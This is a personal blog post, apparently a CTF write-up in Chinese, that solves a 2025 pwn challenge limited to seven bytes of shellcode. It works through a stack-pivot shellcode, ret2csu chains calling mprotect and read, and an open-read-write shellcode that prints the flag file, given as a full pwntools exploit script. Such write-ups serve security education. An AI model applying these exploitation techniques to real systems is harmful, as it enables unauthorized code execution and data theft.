mick0960's blog
0%

不同类型的shellcode题解法

发表于 分类于 Valine:
本文字数: 2.6k 阅读时长 ≈ 2 分钟

2025 星芒杯

分析

image-20251206191942174

只能输入七个字节,且输入完后权限改为了r-x,shellcode段不可写

解决方法为打栈

shellcode:

1
2
3
4
5
xor     edi, edi
push    rsp
pop     rsi
syscall 
ret

最后csu套csu mprotect然后read

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
#!/usr/bin/env python3
"""
author: mick0960
time: 2025-12-06 11:24:33
"""
from pwn import *
from ctypes import *
import inspect

# ----------------function area start----------------#
sla = lambda ch, data: p.sendlineafter(ch, data)
sda = lambda ch, data: p.sendafter(ch, data)
sd = lambda data: p.send(data)
sl = lambda data: p.sendline(data)
addr32 = lambda: u32(p.recvuntil(b"\xf7")[-4:])
addr64 = lambda: u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
ru = lambda con: p.recvuntil(con)


def lg(addr):
    frame = inspect.currentframe().f_back
    variables = {id(val): name for name, val in frame.f_locals.items()}
    addr_name = variables.get(id(addr), "Unknown")
    log.success(f"{addr_name} --> {hex(addr) if isinstance(addr, int) else addr}")


def debug(pie=0, bp=None):
    if pie:
        base = p.libs()[p.elf.path]
        if bp:
            if isinstance(bp, str):
                bp = f"*{hex(base + int(bp, 16))}"
            elif isinstance(bp, list):
                bp = [f"*{hex(base + int(b, 16))}" for b in bp]
        gdb.attach(p, gdbscript="\n".join(bp) if bp else None)
    else:
        if bp:
            if isinstance(bp, str):
                bp = f"b *{bp}"
            elif isinstance(bp, list):
                bp = [f"b *{b}" for b in bp]
        gdb.attach(p, gdbscript="\n".join(bp) if bp else None)
    pause()


# ----------------function area end------------------#
# ----------------predefine area start------------------#
elf_name = "/mnt/f/challenges/test/attachment"
p = process(elf_name)
context.log_level = "debug"
elf = context.binary = ELF(elf_name)
libc_name = ""
libc = ELF(libc_name) if libc_name else None


# ----------------predefine area end------------------#
def csu(func, edi, rsi, rdx, ret):
    payload = p64(0x4013AA)
    payload += p64(0)  # rbx
    payload += p64(1)  # rbp
    payload += p64(edi)  # edi
    payload += p64(rsi)  # rsi
    payload += p64(rdx)  # rdx
    payload += p64(func)  # func
    payload += p64(0x401390) + p64(0) * 7 + ret
    return payload


base = 0x600000
shellcode = "\x31\xff\x54\x5e\x0f\x05\xc3"
# debug(pie=0, bp=['0x4012fc'])
sda("can do?", shellcode)


sd(
    csu(
        elf.got.mprotect,
        base,
        0x1000,
        7,  # mprotect(base, 0x1000, 7)
        csu(elf.got.read, 0, base, 0x1000, p64(base)),  # read(0, base, 0x1000)
    )
)

orw = asm(
"""
push 0x67616c66
mov rdi,rsp
xor esi,esi
push 2
pop rax
syscall
mov rdi,rax
mov rsi,rsp
mov edx,0x100
xor eax,eax
syscall
mov edi,1
mov rsi,rsp
push 1
pop rax
syscall
"""
)
sd(orw)


p.interactive()